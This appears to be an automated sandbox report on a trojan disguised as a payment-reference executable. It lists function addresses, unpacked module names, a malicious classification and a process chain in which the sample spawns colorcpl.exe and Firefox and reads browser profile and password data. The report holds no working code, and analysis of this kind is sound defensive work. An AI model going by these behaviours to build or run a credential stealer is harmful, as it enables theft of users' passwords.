Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8CE93	4_2_01B8CE93
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AE2E90	4_2_01AE2E90
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8EEDB	4_2_01B8EEDB
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8EE26	4_2_01B8EE26
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD0E59	4_2_01AD0E59
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ADB1B0	4_2_01ADB1B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B9B16B	4_2_01B9B16B
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABF172	4_2_01ABF172
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B0516C	4_2_01B0516C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B870E9	4_2_01B870E9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8F0E0	4_2_01B8F0E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD70C0	4_2_01AD70C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7F0CC	4_2_01B7F0CC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B1739A	4_2_01B1739A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8132D	4_2_01B8132D
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01ABD34C	4_2_01ABD34C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD52A0	4_2_01AD52A0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B712ED	4_2_01B712ED
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEB2C0	4_2_01AEB2C0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6D5B0	4_2_01B6D5B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B995C3	4_2_01B995C3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B87571	4_2_01B87571
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8F43F	4_2_01B8F43F
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AC1460	4_2_01AC1460
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8F7B0	4_2_01B8F7B0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B816CC	4_2_01B816CC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B15630	4_2_01B15630
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B65910	4_2_01B65910
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD9950	4_2_01AD9950
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEB950	4_2_01AEB950
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD38E0	4_2_01AD38E0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B3D800	4_2_01B3D800
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEFB80	4_2_01AEFB80
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B45BF0	4_2_01B45BF0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B0DBF9	4_2_01B0DBF9
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8FB76	4_2_01B8FB76
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B15AA0	4_2_01B15AA0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B71AA3	4_2_01B71AA3
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B6DAAC	4_2_01B6DAAC
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B7DAC6	4_2_01B7DAC6
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B43A6C	4_2_01B43A6C
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8FA49	4_2_01B8FA49
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B87A46	4_2_01B87A46
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AEFDC0	4_2_01AEFDC0
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B87D73	4_2_01B87D73
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B81D5A	4_2_01B81D5A
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD3D40	4_2_01AD3D40
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8FCF2	4_2_01B8FCF2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B49C32	4_2_01B49C32
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8FFB1	4_2_01B8FFB1
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD1F92	4_2_01AD1F92
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A93FD2	4_2_01A93FD2
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01A93FD5	4_2_01A93FD5
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01B8FF09	4_2_01B8FF09
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: 4_2_01AD9EB0	4_2_01AD9EB0
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CBCAB9	5_2_02CBCAB9
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CBC8E1	5_2_02CBC8E1
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CBE861	5_2_02CBE861
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CBE641	5_2_02CBE641
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CC4F91	5_2_02CC4F91
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Code function: 5_2_02CDD451	5_2_02CDD451
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05270535	7_2_05270535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05330591	7_2_05330591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05314420	7_2_05314420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05322446	7_2_05322446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0531E4F6	7_2_0531E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05270770	7_2_05270770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05294750	7_2_05294750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0526C7C0	7_2_0526C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0528C6E0	7_2_0528C6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05260100	7_2_05260100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0530A118	7_2_0530A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052F8158	7_2_052F8158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053241A2	7_2_053241A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053301AA	7_2_053301AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053281CC	7_2_053281CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05302000	7_2_05302000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532A352	7_2_0532A352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053303E6	7_2_053303E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527E3F0	7_2_0527E3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05310274	7_2_05310274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052F02C0	7_2_052F02C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527AD00	7_2_0527AD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0530CD1F	7_2_0530CD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05288DBF	7_2_05288DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0526ADE0	7_2_0526ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05270C00	7_2_05270C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05310CB5	7_2_05310CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05260CF2	7_2_05260CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05312F30	7_2_05312F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B2F28	7_2_052B2F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05290F30	7_2_05290F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052E4F40	7_2_052E4F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052EEFA0	7_2_052EEFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527CFE0	7_2_0527CFE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05262FC8	7_2_05262FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532EE26	7_2_0532EE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05270E59	7_2_05270E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532CE93	7_2_0532CE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05282E90	7_2_05282E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532EEDB	7_2_0532EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05286962	7_2_05286962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052729A0	7_2_052729A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0533A9A6	7_2_0533A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05272840	7_2_05272840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527A840	7_2_0527A840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052568B8	7_2_052568B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0529E8F0	7_2_0529E8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532AB40	7_2_0532AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05326BD7	7_2_05326BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0526EA80	7_2_0526EA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05327571	7_2_05327571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0530D5B0	7_2_0530D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053395C3	7_2_053395C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532F43F	7_2_0532F43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05261460	7_2_05261460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532F7B0	7_2_0532F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B5630	7_2_052B5630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053216CC	7_2_053216CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052A516C	7_2_052A516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0525F172	7_2_0525F172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0533B16B	7_2_0533B16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0527B1B0	7_2_0527B1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532F0E0	7_2_0532F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053270E9	7_2_053270E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052770C0	7_2_052770C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0531F0CC	7_2_0531F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532132D	7_2_0532132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0525D34C	7_2_0525D34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B739A	7_2_052B739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052752A0	7_2_052752A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_053112ED	7_2_053112ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0528B2C0	7_2_0528B2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05327D73	7_2_05327D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05273D40	7_2_05273D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05321D5A	7_2_05321D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0528FDC0	7_2_0528FDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052E9C32	7_2_052E9C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532FCF2	7_2_0532FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532FF09	7_2_0532FF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532FFB1	7_2_0532FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05271F92	7_2_05271F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233FD2	7_2_05233FD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05233FD5	7_2_05233FD5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05279EB0	7_2_05279EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05305910	7_2_05305910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05279950	7_2_05279950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0528B950	7_2_0528B950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052DD800	7_2_052DD800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052738E0	7_2_052738E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532FB76	7_2_0532FB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0528FB80	7_2_0528FB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052ADBF9	7_2_052ADBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052E5BF0	7_2_052E5BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052E3A6C	7_2_052E3A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05327A46	7_2_05327A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0532FA49	7_2_0532FA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_052B5AA0	7_2_052B5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_05311AA3	7_2_05311AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0530DAAC	7_2_0530DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0531DAC6	7_2_0531DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03051B10	7_2_03051B10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0304CA50	7_2_0304CA50
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0304AEC8	7_2_0304AEC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0304CC70	7_2_0304CC70
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0304ACF0	7_2_0304ACF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_030533A0	7_2_030533A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_03055160	7_2_03055160
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0306B860	7_2_0306B860
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0558E75C	7_2_0558E75C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0558E3C6	7_2_0558E3C6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0558E2A4	7_2_0558E2A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 7_2_0558D828	7_2_0558D828

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: String function: 01B17E54 appears 111 times
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: String function: 01B3EA12 appears 86 times
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: String function: 01ABB970 appears 280 times
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: String function: 01B05130 appears 58 times
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Code function: String function: 01B4F290 appears 105 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 052DEA12 appears 86 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 052B7E54 appears 111 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 0525B970 appears 280 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 052A5130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 052EF290 appears 105 times

Source: NF_Payment_Ref_FAN930276.exe, 00000000.00000002.2094998231.000000000097E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs NF_Payment_Ref_FAN930276.exe
Source: NF_Payment_Ref_FAN930276.exe, 00000000.00000002.2107185373.000000000B360000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs NF_Payment_Ref_FAN930276.exe
Source: NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264575035.0000000001628000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecolorcpl.exej% vs NF_Payment_Ref_FAN930276.exe
Source: NF_Payment_Ref_FAN930276.exe, 00000004.00000002.2264826942.0000000001BBD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs NF_Payment_Ref_FAN930276.exe
Source: NF_Payment_Ref_FAN930276.exe	Binary or memory string: OriginalFilenamefRbU.exe: vs NF_Payment_Ref_FAN930276.exe

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, Sli4DW9alcwqplWEds.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.AddAccessRule
Source: 0.2.NF_Payment_Ref_FAN930276.exe.4354410.2.raw.unpack, Sli4DW9alcwqplWEds.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.AddAccessRule
Source: 0.2.NF_Payment_Ref_FAN930276.exe.42cc5f0.1.raw.unpack, Sli4DW9alcwqplWEds.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.SetAccessControl
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.NF_Payment_Ref_FAN930276.exe.b360000.4.raw.unpack, sueo5UdIx8bBgI6PCF.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@9/2@16/12

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NF_Payment_Ref_FAN930276.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\colorcpl.exe

File created: C:\Users\user\AppData\Local\Temp\Ea64OHKq

Jump to behavior

Source: NF_Payment_Ref_FAN930276.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: NF_Payment_Ref_FAN930276.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: colorcpl.exe, 00000007.00000003.2448320920.000000000385F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4486968651.000000000387F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000003.2448422703.000000000384B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4486968651.000000000384B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: NF_Payment_Ref_FAN930276.exe	ReversingLabs: Detection: 60%
Source: NF_Payment_Ref_FAN930276.exe	Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Process created: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe "C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe"	Jump to behavior
Source: C:\Program Files (x86)\eROVoFobOWKuBHetsTIgsKlDQIveGpUTdpiHQSbYAGLQaaUshtCAvQAnzb\xIrbjTuvDXL.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\NF_Payment_Ref_FAN930276.exe	Section loaded: windowscodecs.dll	Jump to behavior
